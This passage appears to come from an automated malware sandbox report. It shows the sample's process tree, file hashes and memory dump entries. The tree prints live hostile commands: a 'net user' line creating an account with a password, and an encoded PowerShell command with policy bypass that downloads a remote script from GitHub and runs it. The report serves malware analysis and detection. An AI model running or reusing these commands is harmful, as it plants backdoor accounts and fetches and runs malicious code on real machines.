  - [2] C:\Windows\system32\net.exe
    Command line: net.exe user updwin a7ZkH15H
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user updwin a7ZkH15H
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic path win32_VideoController get name
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic path win32_VideoController get name
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic CPU get NAME
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic CPU get NAME
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\cmd.exe
    Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      - Blacklisted process makes network request
      - Drops file in Program Files directory
      - Drops file in Windows directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\RESABE5.tmp
  MD5: d7caad440a8e0f1dece3f1df6a9edd79
  SHA1: d7ff284381c115816759b43f3d9fa7df8e26f358
  SHA256: c29aa192e220432fd08b810aca67225f6520be61db8773b920a0aaae5861acd2
  SHA512: 75a4a24cf98d2b034e3b81fe50b8910fb7483b4db6f0e8657cfdc7ef3fba0e0932f1ccdc63e70900e47e9ef45cb85de68b78fa9a017035edc2560a6e81bc93ff
- C:\Users\Admin\AppData\Local\Temp\get-points.ps1
  MD5: dac6b25db50155c0c78d5bf64fb95fa3
  SHA1: 9e49c8f7a6df94acdefd0daa4c330f92f6d01d0d
  SHA256: 6967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf
  SHA512: 679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868
- C:\Users\Admin\AppData\Local\Temp\get-points.zip
  MD5: 7cac19b2868c41555db4b71219217f9b
  SHA1: d6f77db578db3c5c572c3a944d9072ed00560dcb
  SHA256: d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a
  SHA512: 5bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6
- C:\Users\Admin\AppData\Local\Temp\hvjt0zup\hvjt0zup.dll
  MD5: d18740618b9e089d99a39dd09bf9959d
  SHA1: df977c9ae75ef10ed16a02f3714eabfae85ae2c8
  SHA256: 9f08a8e40c464fcb0a7da9dcc0aefe01d5d699deb611a9ffc17356c9e7cfba7e
  SHA512: d3c5261155ab552291dea86171f15d075850f7b7cbda2b8f816aaba7fe20dcc5d051f60a5058d0ee7d1addd589be824490c0936510a2eae14af70ab78b8c0b63
- \??\c:\Users\Admin\AppData\Local\Temp\hvjt0zup\CSC6AEF796A864D438BCECA6AB8CF2FC.TMP
  MD5: fad80ee43652ede2b2a925636b6afaf2
  SHA1: 1deb52e7c868612d96fe120b219c578935f7dae2
  SHA256: 791a419f2e73a2febcc5d5768fdc09c806ca6899b94f9c59fb0b4fd4bbc4f8cb
  SHA512: c3a2c5d1c394d4e30abbc6ea82a0c87e3416ad54c94f4692b709a6100157882e12a5dcd5ae2ce3b9b68090eab771118f5b7926f9d45e3f0098ffdbe261d704c9
- \??\c:\Users\Admin\AppData\Local\Temp\hvjt0zup\hvjt0zup.0.cs
  MD5: 6f235215132cdebacd0f793fe970d0e3
  SHA1: 2841e44c387ed3b6f293611992f1508fe9b55b89
  SHA256: ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
  SHA512: a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
- \??\c:\Users\Admin\AppData\Local\Temp\hvjt0zup\hvjt0zup.cmdline
  MD5: 8dd7e19d4dfad47dcf67542b35be5a11
  SHA1: 56ddc8395bce28584087cfa6ffded7e5476bc00b
  SHA256: f35634561390ebffbd3ec2d78b6b52c3c3605e0dbe0ceca9b406550519267032
  SHA512: 807716cf1080d19a47bfd4700efbe5c3fc80abcce2ca601a070e0fe7d44c811131d3b92f40c0b1e34fcb59e887b09f143ed5ab7424f6dc4e4387f30730c285ae
- \Windows\Branding\mediasrv.png
  MD5: eeb448ea2709c57b9ea2e223d0c79396
  SHA1: 38331dd027386151ee37a29a7820570a76427b02
  SHA256: c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272
  SHA512: c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc
- \Windows\Branding\mediasvc.png
  MD5: bb873bd05a47f502ee4ed3c4ea749a4f
  SHA1: e55a6bf49a4833fb9e9b123df39dac9bf507f75a
  SHA256: a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a
  SHA512: ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548
-
memory/212-31-0x0000000000000000-mapping.dmp
-
memory/512-43-0x0000000000000000-mapping.dmp
-
memory/896-25-0x0000000000000000-mapping.dmp
-
memory/928-26-0x0000000000000000-mapping.dmp
-
memory/984-1-0x0000000001850000-0x0000000001851000-memory.dmp (Filesize: 4KB)
-
memory/1332-27-0x0000000000000000-mapping.dmp
-
memory/1416-17-0x0000000000000000-mapping.dmp
-
memory/1440-42-0x0000000000000000-mapping.dmp
-
memory/1592-20-0x0000000000000000-mapping.dmp
-
memory/1728-32-0x0000000000000000-mapping.dmp
-
memory/2148-19-0x0000000000000000-mapping.dmp
-
memory/2152-44-0x0000000000000000-mapping.dmp
-
memory/2152-18-0x0000000000000000-mapping.dmp
-
memory/2200-35-0x0000000000000000-mapping.dmp
-
memory/2284-24-0x0000000000000000-mapping.dmp
-
memory/2424-7-0x0000000000000000-mapping.dmp
-
memory/2560-39-0x0000000000000000-mapping.dmp
-
memory/3076-21-0x0000000000000000-mapping.dmp
-
memory/3116-33-0x0000000000000000-mapping.dmp
-
memory/3156-5-0x0000015B76000000-0x0000015B76001000-memory.dmp (Filesize: 4KB)
-
memory/3156-3-0x00007FF81FB40000-0x00007FF82052C000-memory.dmp (Filesize: 9.9MB)
-
memory/3156-4-0x0000015B5B9E0000-0x0000015B5B9E1000-memory.dmp (Filesize: 4KB)
-
memory/3156-2-0x0000000000000000-mapping.dmp
-
memory/3156-14-0x0000015B75F80000-0x0000015B75F81000-memory.dmp (Filesize: 4KB)
-
memory/3296-38-0x0000000000000000-mapping.dmp
-
memory/3488-50-0x0000000000000000-mapping.dmp
-
memory/3500-23-0x0000000000000000-mapping.dmp
-
memory/3512-36-0x0000000000000000-mapping.dmp
-
memory/3776-41-0x0000000000000000-mapping.dmp
-
memory/3796-22-0x0000000000000000-mapping.dmp
-
memory/3808-15-0x0000000000000000-mapping.dmp
-
memory/3888-51-0x0000000000000000-mapping.dmp
-
memory/3924-34-0x0000000000000000-mapping.dmp
-
memory/3944-37-0x0000000000000000-mapping.dmp
-
memory/3984-16-0x0000000000000000-mapping.dmp
-
memory/3996-30-0x0000000000000000-mapping.dmp
-
memory/4032-40-0x0000000000000000-mapping.dmp
-
memory/4072-45-0x0000000000000000-mapping.dmp
-
memory/4072-46-0x00007FF81FB40000-0x00007FF82052C000-memory.dmp (Filesize: 9.9MB)
-
memory/4088-10-0x0000000000000000-mapping.dmp